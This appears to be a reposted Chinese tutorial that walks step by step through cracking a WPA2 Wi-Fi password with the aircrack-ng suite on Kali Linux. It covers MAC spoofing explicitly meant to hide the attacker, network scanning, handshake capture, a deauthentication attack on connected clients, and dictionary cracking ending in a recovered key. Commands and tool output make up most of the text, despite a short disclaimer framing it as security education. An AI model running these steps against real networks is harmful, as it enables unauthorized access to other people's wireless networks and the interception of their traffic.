当前位置:文档之家› AirCrack破解无线密码

AirCrack破解无线密码

破解WPA/WPA2无线网络

经过一段时间研究实验,摸索出以下步骤,该文档仅供热衷于网络安全事业的兄弟们学习分享、严谨破环攻击,让大家知道无线网络目前存在很多漏洞,在以后的网络部署和使用中,制定适合自己的安全策略和密码策略,提高自身安全意识。

1.查看无线网络接口

root@kali:~# airmon-ng

Interface Chipset Driver

wlan0 Intel 6200 iwlwifi - [phy0]

2.停止无线网络接口

root@kali:~# airmon-ng stop wlan0

Interface Chipset Driver

wlan0 Intel 6200 iwlwifi - [phy0]

(monitor mode disabled)

3.修改无线网卡地址,为了攻击别人时隐藏自己的mac地址,此步骤操作过程中个人习惯性将自己的mac地址备份到记事本文件中,方便后

续修改回来

root@kali:~# macchanger --mac 00:11:22:33:44:55 waln0

4.启用无线网络接口

root@kali:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

-e

PID Name

2527 NetworkManager

2640 wpa_supplicant

Interface Chipset Driver

wlan0 Intel 6200 iwlwifi - [phy0]

(monitor mode enabled on mon1)

mon0 Intel 6200 iwlwifi - [phy0]

【参数说明】:

Interface:接口名称

Chipset:无线网卡芯片,如本机为Intel 6200

Driver:无限网卡驱动,如本机为iwlwifi,亦可以使用lsmod查看加载的所有模块,其中包括无线网卡驱动模块

monitor:本网卡的监控状态,enabled监控启动,disabled,监控关闭

5.查看附近可用的无线网络有哪些

root@kali:~# airodump-ng wlan0

CH 5 ][ Elapsed: 8 s ][ 2014-07-10 15:19

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

A4:DB:30:FE:B2:F0 -1 0 0 0 -1 -1

8C:21:0A:3F:9B:30 -1 0 2 0 6 -1 WPA

C8:D3:A3:0D:6C:B0 -41 33 2 0 4 54e. WPA2 CCMP PSK kali-test 00:87:36:42:57:5A -64 6 0 0 6 54e. WPA2 CCMP PSK 360WiFi-575A 00:87:36:2B:E0:98 -67 12 0 0 11 54e. WPA2 CCMP PSK 360WiFi-E098 EC:88:8F:63:B1:2A -72 18 0 0 6 54e. WPA2 CCMP PSK 888

00:87:36:2C:3C:F1 -72 3 0 0 11 54e. WPA2 CCMP PSK WiFi

78:A1:06:FD:8D:BE -73 14 0 0 11 54e. WPA2 CCMP PSK 314ap A8:54:B2:2D:96:A6 -73 10 2 0 13 54e. WPA2 CCMP PSK DBCOM D8:15:0D:3A:78:32 -76 6 0 0 6 54e. WPA2 CCMP PSK TP-LINK_yx905

70:65:82:AF:63:02 -76 12 0 0 1 54e WPA2 CCMP PSK emssjcjpt

【参数说明】:

BSSID:无线AP的地址

PWR:无线的信号强度或水平

Beacons:无线发出的通告编号

#Data:被捕获到的数据分组的数量,包括广播分组

#/s:过去10s内每秒捕获数据分组的数量

CH:信道号,从Beacons中获取,如:1、4、6、11、13等

MB:无限所支持的最大速率,如果MB=11,则是802.11b,如果MB=22,则是802.11b+,如果更高则是802.11g或802.11n

ENC:使用的加密算法体系。OPEN表示无加密,WEB表示WEP加密,TKIP或CCMP表示WPA/WPA2

CIPHER:检测到的加密算法,TKIP与WPA结合使用,CCMP(即AES)与WPA2结合使用,平时TP-link或D-link中的密码类型中可以看到

AUTH:使用的认证协议,MGT(独立的认证服务器,如802.1x、radius、esp等)、SKA(WEP的共享密钥)、PSK(WPA/WPA2的预共享密钥)或OPEN(WEP开放式)

ESSID:指大家经常说的所谓的SSID,通俗的说就是我们对无线网络的命名,如:kali-test。如果启用隐藏,可以为空

STATION:客户端的mac地址

Rate:表示传输率

Lost:过去10s内丢失的数据分组,基于序列号检测

Frame:客户端发送的数据分组数量

Probe:被客户端查探的ESSID。如果客户端正试图连接一个无线,但是没有连接上,就会在该处显示

6.捕获数据包

root@kali:~# airodump-ng -c 4 -w kalitest --bssid C8:D3:A3:0D:6C:B0 mon0 抓取需要攻击的单一目标无线AP的数据包

root@kali:~# airodump-ng -c 4 -w kalitest mon0 抓取mon0可发现的所有数据包,用于在无线网络较多时破解密码

【参数说明】:

-c 4 指定选择的频道,指的是被探测的无线网络的频道或信道,通过步骤5中数据可用得到

-w kalitest 指定一个文件名,将抓取的数据包写入kalitest文件中,停止后会生成kalitest-01.cap、kalitest-02.cap等文件,系统自动在生成的文件中增加序列号,方便抓取多数包时,使用kalitest*.cap进行破解

--bssid 指定被攻击的BSSID

【实际数据案例】:

CH 4 ][ Elapsed: 8 s ][ 2014-07-10 16:34

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C8:D3:A3:0D:6C:B0 -29 70 63 11 1 4 54e. WPA2 CCMP PSK kali-test

BSSID STATION PWR Rate Lost Frames Probe

C8:D3:A3:0D:6C:B0 A4:99:47:A3:65:51 -37 0e- 0e 267 12

7.为协助【步骤6】抓取到有用数据(包含用户名和密码),实验时,我们需要模拟数据发送,实际真正使用时,只要AP不断有用户进入并产

生数据,该步骤可用省略

案例:

(1)对无线网络kali-test进行Deauth攻击,此时重新打开一个终端窗口进行操作

root@kali:~# aireplay-ng --deauth 1 -a C8:D3:A3:0D:6C:B0 -c 00:11:22:33:44:55 mon0

15:00:13 Waiting for beacon frame (BSSID: C8:D3:A3:0D:6C:B0) on channel 4

15:00:13 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [ 0|58 ACKs]

root@kali:~#

或者使用

root@kali:~# aireplay-ng -0 10 -a C8:D3:A3:0D:6C:B0 -c 00:11:22:33:44:55 mon0

本次实验使用的是第一种方式

(2)实验时,让已知密码的用户使用手机或笔记本连接AP,此时连接的用户名和密码等全部会被【步骤6】截获。

(3)此时可用通过airodump-ng wlan0的数据部分【#Date】看到数据包在不停增长,在该种情况下,【步骤6】抓包才有意义。

8.查找系统自带密码字典,找到后即可进行攻击,本步骤亦可以上网下载密码字典

(1)lst密码字典

root@kali:~# find / -name password.lst

/usr/share/john/password.lst

/usr/share/metasploit-framework/data/john/wordlists/password.lst

root@kali:~#

(2)dic密码字典

root@kali:~# find / -name *.dic

/usr/share/hunspell/en_US.dic

/usr/share/liblouis/tables/hyph_pl_PL.dic

/usr/share/liblouis/tables/hyph_sv_SE.dic

/usr/share/liblouis/tables/hyph_de_DE.dic

/usr/share/liblouis/tables/hyph_es_ES.dic

/usr/share/liblouis/tables/hyph_pt_PT.dic

/usr/share/liblouis/tables/hyph_fr_FR.dic

/usr/share/liblouis/tables/hyph_it_IT.dic

/usr/share/liblouis/tables/hyph_en_US.dic

/usr/share/liblouis/tables/hyph_cs_CZ.dic

/usr/share/liblouis/tables/hyph_no_NO.dic

/usr/share/liblouis/tables/hyph_nl_NL.dic

root@kali:~#

9.利用抓取的数据包开始破解

root@kali:~# aircrack-ng -w /usr/share/john/password.lst kalitest-02.cap Opening kalitest-02.cap

Read 3168 packets.

# BSSID ESSID Encryption

1 C8:D3:A3:0D:6C:B0 kali-test WPA (1 handshake) Choosing first network as target.

Opening kalitest-02.cap

Reading packets, please wait...

Aircrack-ng 1.2 beta3

[00:00:00] 556 keys tested (1556.59 k/s)

KEY FOUND! [ admin123 ]

Master Key : DD CB 04 8D ED 21 00 E6 4E 2E 8B A7 08 1E 64 7E 86 DA 81 4C 70 D7 0A 14 E6 A5 47 E7 F4 DA 79 0F

Transient Key : E9 8D CC C5 D2 B9 DF 0A 98 E2 8C 92 19 28 C7 55 15 E1 37 45 79 DD D3 85 CB 12 56 EC 88 9B 50 1E

EF DD 19 7C E9 D2 0B 6F 75 CA CC DA B5 40 BC BD

3F A0 B2 BD 70 E9 D4 02 92 4F CB 17 D6 3A E9 B0

EAPOL HMAC : C2 E5 5F F0 77 DE 46 1B B3 8E 53 3A FC B3 E2 9E 到此为止,无线AP(essid:kali-test)密码破解成功,密码为admin123。

相关主题
文本预览
相关文档 最新文档